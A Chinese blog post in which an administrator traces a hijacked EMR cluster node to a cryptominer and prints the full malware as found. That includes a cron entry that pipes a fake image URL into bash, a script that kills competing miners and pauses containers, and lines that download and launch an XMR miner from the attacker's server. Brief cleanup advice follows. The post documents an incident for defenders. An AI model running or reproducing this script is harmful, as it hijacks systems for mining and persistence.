最近emr集群跑任务的时候总出现 task failed ,优化sql,调提交任务参数都没解决,最后再我排查时候,发现一个从节点的cpu使用800%

经过一些列排查,发现是被注入木马了,

#被人种下的crontab
#* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s

点击过去伪装的是一张图片,其实crul过去是下面的脚本,,,具体你们应该可以知道了吧,最后居然发现他么是在挖矿,

#!/bin/sh
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 jva
pkill -f ./atd
pkill -f /tmp/wa/httpd.conf
pkill -f 108.61.186.224
pkill -f 128.199.86.57
pkill -f 67.231.243.10
pkill -f 142.4.124.164
pkill -f 192.99.56.117
pkill -f 45.76.102.45
pkill -f AnXqV.yam
pkill -f BI5zj
pkill -f Carbon
pkill -f Duck.sh
pkill -f Guard.sh
pkill -f JnKihGjn
pkill -f KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -f NXLAi
pkill -f XJnRj
pkill -f accounts-daemon
pkill -f askdljlqw
pkill -f atd
pkill -f bonn.sh
pkill -f bonns
pkill -f carbon
pkill -f conn.sh
pkill -f conns
pkill -f crypto-pool
pkill -f ddg
pkill -f donns
pkill -f gekoCrw
pkill -f gekoCrw32
pkill -f gekoba2anc1
pkill -f gekoba5xnc1
pkill -f gekobalanc1
pkill -f gekobalance
pkill -f gekobalanq1
pkill -f gekobnc1
pkill -f ir29xc1
pkill -f irpbalanc1
pkill -f jIuc2ggfCAvYmluL2Jhc2gi
pkill -f jaav
pkill -f jva
pkill -f kw.sh
pkill -f kworker34
pkill -f kxjd
pkill -f lexarbalanc1
pkill -f lower.sh
pkill -f lowerv2.sh
pkill -f lowerv3.sh
pkill -f minerd
pkill -f minergate
pkill -f minergate-cli
pkill -f minexmr
pkill -f mixnerdx
pkill -f mule
pkill -f mutex
pkill -f myatd
pkill -f performedl
pkill -f polkitd
pkill -f pro.sh
pkill -f pubg
pkill -f pvv
pkill -f root.sh
pkill -f rootv2.sh
pkill -f rootv3.sh
pkill -f servcesa
pkill -f sleep
pkill -f sourplum
pkill -f stratum
pkill -f vsp
pkill -f watch-smart
pkill -f wget
pkill -f ysaydh
pkill -f acpid
pkill -9 ./atd
pkill -9 /tmp/wa/httpd.conf
pkill -9 108.61.186.224
pkill -9 128.199.86.57
pkill -9 142.4.124.164
pkill -9 192.99.56.117
pkill -9 45.76.102.45
pkill -9 ./AnXqV.yam
pkill -9 ./BI5zj
pkill -9 ./Carbon
pkill -9 ./Duck.sh
pkill -9 ./Guard.sh
pkill -9 ./JnKihGjn
pkill -9 ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill -9 ./NXLAi
pkill -9 ./XJnRj
pkill -9 ./accounts-daemon
pkill -9 ./askdljlqw
pkill -9 ./atd
pkill -9 ./bonn.sh
pkill -9 ./bonns
pkill -9 ./carbon
pkill -9 ./conn.sh
pkill -9 ./conns
pkill -9 ./crypto-pool
pkill -9 ./ddg
pkill -9 ./donns
pkill -9 ./gekoCrw
pkill -9 ./gekoCrw32
pkill -9 ./gekoba2anc1
pkill -9 ./gekoba5xnc1
pkill -9 ./gekobalanc1
pkill -9 ./gekobalance
pkill -9 ./gekobalanq1
pkill -9 ./gekobnc1
pkill -9 ./ir29xc1
pkill -9 ./irpbalanc1
pkill -9 ./jIuc2ggfCAvYmluL2Jhc2gi
pkill -9 ./jaav
pkill -9 ./jva
pkill -9 ./kw.sh
pkill -9 ./kworker34
pkill -9 ./kxjd
pkill -9 ./lexarbalanc1
pkill -9 ./lower.sh
pkill -9 ./lowerv2.sh
pkill -9 ./lowerv3.sh
pkill -9 ./minerd
pkill -9 ./minergate
pkill -9 ./minergate-cli
pkill -9 ./minexmr
pkill -9 ./mixnerdx
pkill -9 ./mule
pkill -9 ./mutex
pkill -9 ./myatd
pkill -9 ./performedl
pkill -9 ./polkitd
pkill -9 ./pro.sh
pkill -9 ./pubg
pkill -9 ./pvv
pkill -9 ./root.sh
pkill -9 ./rootv2.sh
pkill -9 ./rootv3.sh
pkill -9 ./servcesa
pkill -9 ./sleep
pkill -9 ./sourplum
pkill -9 ./stratum
pkill -9 ./vsp
pkill -9 ./watch-smart
pkill -9 ./wget
pkill -9 ./ysaydh
pkill -9 ./acpid
pkill ./atd
pkill /tmp/wa/httpd.conf
pkill 108.61.186.224
pkill 128.199.86.57
pkill 142.4.124.164
pkill 192.99.56.117
pkill 45.76.102.45
pkill ./AnXqV.yam
pkill ./BI5zj
pkill ./Carbon
pkill ./Duck.sh
pkill ./Guard.sh
pkill ./JnKihGjn
pkill ./KGlJwfWDbCPnvwEJupeivI1FXsSptuyh
pkill ./NXLAi
pkill ./XJnRj
pkill ./accounts-daemon
pkill ./askdljlqw
pkill ./atd
pkill ./bonn.sh
pkill ./bonns
pkill ./carbon
pkill ./conn.sh
pkill ./conns
pkill ./crypto-pool
pkill ./ddg
pkill ./donns
pkill ./gekoCrw
pkill ./gekoCrw32
pkill ./gekoba2anc1
pkill ./gekoba5xnc1
pkill ./gekobalanc1
pkill ./gekobalance
pkill ./gekobalanq1
pkill ./gekobnc1
pkill ./ir29xc1
pkill ./irpbalanc1
pkill ./jIuc2ggfCAvYmluL2Jhc2gi
pkill ./jaav
pkill ./jva
pkill ./kw.sh
pkill ./kworker34
pkill ./kxjd
pkill ./lexarbalanc1
pkill ./lower.sh
pkill ./lowerv2.sh
pkill ./lowerv3.sh
pkill ./minerd
pkill ./minergate
pkill ./minergate-cli
pkill ./minexmr
pkill ./mixnerdx
pkill ./mule
pkill ./mutex
pkill ./myatd
pkill ./performedl
pkill ./polkitd
pkill ./pro.sh
pkill ./pubg
pkill ./pvv
pkill ./root.sh
pkill ./rootv2.sh
pkill ./rootv3.sh
pkill ./servcesa
pkill ./sleep
pkill ./sourplum
pkill ./stratum
pkill ./vsp
pkill ./watch-smart
pkill ./wget
pkill ./ysaydh
pkill ./acpid
ps aux | grep -v supsplk | awk '{if($3>40.0) print $2}' | while read procid
do
kill -9 $procid
done
rm -rf /dev/shm/jboss
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
rm -rf /var/tmp/ysjswirmrm.conf
rm -rf /var/tmp/atd
mkdir /var/tmp
pkill -9 tratum
pkill -9 mixnerdx
pkill -9 performedl
pkill -9 sleep
pkill -9 /tmp/httpd.conf
pkill -9 JnKihGjn
pkill -9 irqba2anc1
pkill -9 irqba5xnc1
pkill -9 irqbnc1
pkill -9 ir29xc1
pkill -9 conns
ps auxw|head -1;ps auxw|sort -rn -k3|head -1|awk '{if($3>60.0) print "kill -9 " $2}'|sh
pkill -9 irqbalance
pkill -9 crypto-pool
pkill -9 XJnRj
pkill -9 NXLAi
pkill -9 BI5zj
pkill -9 askdljlqw
pkill -9 minerd
pkill -9 minergate
pkill -9 Guard.sh
pkill -9 ysaydh
pkill -9 bonns
pkill -9 donns
pkill -9 kxjd
pkill -f sleep
pkill -f /tmp/m
pkill -f JnKihGjn
pkill -f irqba2anc1
pkill -f irqba5xnc1
pkill -f conns
pkill -f irqbalance
pkill -f crypto-pool
pkill -f XJnRj
pkill -f NXLAi
pkill -f BI5zj
pkill -f askdljlqw
pkill -f minerd
pkill -f minergate
pkill -f Guard.sh
pkill -f ysaydh
pkill -f bonns
pkill -f donns
pkill -f kxjd
pkill -f 108.61.186.224
pkill -f Duck.sh
pkill -f bonn.sh
pkill -f conn.sh
pkill -f kworker34
pkill -f kw.sh
pkill -f pro.sh
pkill -f polkitd
pkill -f acpid
pkill -f bb
pkill -9 atd
pkill -9 accounts-daemon
pkill -f yam
ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "snapd"|awk '{print $2}'|xargs kill -9
ps auxf|grep -v grep|grep "mysql_dump"|awk '{print $2}'|xargs kill -9
crontab -r || true && \
echo "* * * * * curl -s http://158.69.133.17:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
crontab /tmp/cron || true && \
rm -rf /tmp/cron || true && \
docker pause `docker ps|grep kube-apis |awk '{print $1}'`
docker pause `docker ps|grep nginx78 |awk '{print $1}'`
curl -o /var/tmp/config.json http://158.69.133.17:8220/config_1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/gcc
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/c1.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/minerd
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd2
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/config.json http://158.69.133.17:8220/kworker.json
curl -o /var/tmp/supsplk http://158.69.133.17:8220/atd3
chmod 777 /var/tmp/supsplk
cd /var/tmp
proc=`grep -c ^processor /proc/cpuinfo`
cores=$(($proc+1))
num=$(($cores*3))
/sbin/sysctl -w vm.nr_hugepages=`$num`
nohup ./supsplk -c config.json -t `echo $cores` >/dev/null &
fi
ps -fe|grep supsplk |grep -v grep
if [ $? -eq 0 ]
then
pwd
else
curl -o /var/tmp/supsplk http://158.69.133.17:8220/yam
chmod 777 /var/tmp/supsplk
cd /var/tmp
nohup ./supsplk -c x -M stratum+tcp://41e2vPcVux9NNeTfWe8TLK2UWxCXJvNyCQtNb69YEexdNs711jEaDRXWbwaVe4vUMveKAzAiA4j8xgUi29TpKXpm3zKTUYo:x@monerohash.com:3333/xmr >/dev/null &
fi
echo "runing....."

解决办法

找到寄生的目录,一般他都会在tmp里,我这个再”/var/tmp/“ 首先你先吧他的crontab干掉 然后 把这个目录下的他脚本产生的文件干掉,然后再把对应的进程杀掉。

上面说的治标不治本,你服务器被攻击了,安全问题,对了 activemp 他的开放端口61616 有漏洞,把这个限制了吧。

supsplk 服务器被植入木马 挖矿 cpu使用 700%的更多相关文章

  1. 服务器被植入木马,CPU飙升200%

    线上服务器用的是某云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序.突然一则噩耗从前线传来:网站不能访问了! 此项目是我负责,我以150+的手速立即打开了服务器, ...

  2. 服务器被疑似挖矿程序植入,发现以及解决过程(建议所有使用sonatype/nexus3的用户清查一下)

    此次服务器被植入挖矿程序发现起来较为巧合,首先是上周三开始,我通过sonatype/nexus3搭建的仓库间歇性崩溃,但是每次重新start一下也能直接使用所以没有彻底清查,去docker logs里 ...

  3. 记一次服务器被植入挖矿木马cpu飙升200%解决过程

    线上服务器用的是某讯云的,欢快的完美运行着Tomcat,MySQL,MongoDB,ActiveMQ等程序.突然一则噩耗从前线传来:网站不能访问了. 此项目是我负责,我以150+的手速立即打开了服务器 ...

  4. linux 服务器被植入ddgs、qW3xT.2挖矿病毒处理记录

    被入侵后的现象: 发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现. kill 掉这两个异常进程后,过一段时间看到了如下进程: 首先在/etc/sysc ...

  5. 解决:阿里云服务器被植入挖矿程序后修改密码失败的问题(报错:passwd: Authentication token manipulation error)

    如下图,在修改密码的时候会报错 原因: 通常不能修改密码都是/etc/passwd文件或者/etc/shadow文件被锁住了 解决: 检查/etc/passwd文件和/etc/shadow文件是否被锁 ...

  6. Linux系统是否被植入木马的排查流程梳理

    在日常繁琐的运维工作中,对linux服务器进行安全检查是一个非常重要的环节.今天,分享一下如何检查linux系统是否遭受了入侵? 一.是否入侵检查 1)检查系统日志 1 2 检查系统错误登陆日志,统计 ...

  7. Linux服务器感染kerberods病毒 | 挖矿病毒查杀及分析 | (curl -fsSL lsd.systemten.org||wget -q -O- lsd.systemten.org)|sh)

    概要: 一.症状及表现 二.查杀方法 三.病毒分析 四.安全防护 五.参考文章 一.症状及表现 1.CPU使用率异常,top命令显示CPU统计数数据均为0,利用busybox 查看CPU占用率之后,发 ...

  8. Apache服务器httpd.exe进程占用cpu超过50%的解决方法

    httpd.exe进程占用cpu超过50%,关闭掉Apache服务,cpu应用率立刻下降到0.  重新启动Apache又出现占用cpu高的情况.  原因是:httpd.exe和防火墙配置有冲突. 解决 ...

  9. Java 连接远程Linux 服务器执行 shell 脚本查看 CPU、内存、硬盘信息

    pom.xml jar 包支持 <dependency> <groupId>com.jcraft</groupId> <artifactId>jsch& ...

随机推荐

  1. php设计模式之注册模式

    注册模式,解决全局共享和交换对象.已经创建好的对象,挂在到某个全局可以使用的数组上,在需要使用的时候,直接从该数组上获取即可.将对象注册到全局的树上.任何地方直接去访问. <?php class ...

  2. mysql-1.1基础

    笔记内容:mysql基础,创建数据库,创建表,操作数据表,操作数据,简单查询,条件查询,排序,分组,聚合,连接查询(等值连接,内连接,外链接),子查询 自己提示:脑图笔记存于网盘中  右键:新标签页打 ...

  3. Codeforces 1196C. Robot Breakout

    传送门 维护合法区域的四个边 $xa,ya,xb,yb$ 表示在以 $(xa,ya)$ 为左下角,以 $(xb,yb)$ 为右上角的矩形内的点都是合法答案 对于一个起点 $(x,y)$,如果没法往左, ...

  4. JS基础_js编写位置

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  5. 25 Python之模块与包

    一.模块   模块就是一个包含了python定义和申明的文件,文件名就是模块的名字加上.py的后缀/ 模块的分类:     1.使用python编写的py文件     2.已被编译位共享库或者DLL或 ...

  6. Three.js类似于波浪的效果

    <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title> ...

  7. MySQL--高性能MySQL笔记二

    人们通常使用varchar(15):来存储IP地址,然而它们其实是32位无符号整数,不是字符串,所以应该使用无符号整数存储IP地址,MySQL 提供 INET_ATON() 和 INET_NTOA() ...

  8. NTL 库函数

    NTL是一个高性能,可移植的C ++库,为任意长度的整数提供数据结构和算法; 可用于整数和有限域上的向量,矩阵和多项式; 可用于任意精度浮点运算. NTL为以下方面提供高质量的最先进算法实现: 任意长 ...

  9. 利用shell脚本做一个用户登录系统

    效果图如下: #!/bin/bash# while truedocat << EOF//======================\\\\| 用户登录系统 |-------------- ...

  10. 韦东山嵌入式Linux学习笔记08--中断体系结构

    中断是什么? 举个栗子, 系统怎么知道你什么时候插入鼠标这个设备? 可以有两种处理方式: 1. 查询方式: 轮询去检测是否有设备插入; 2. 中断的方式 当鼠标插入这个事件发生时, 置位某个寄存器,告 ...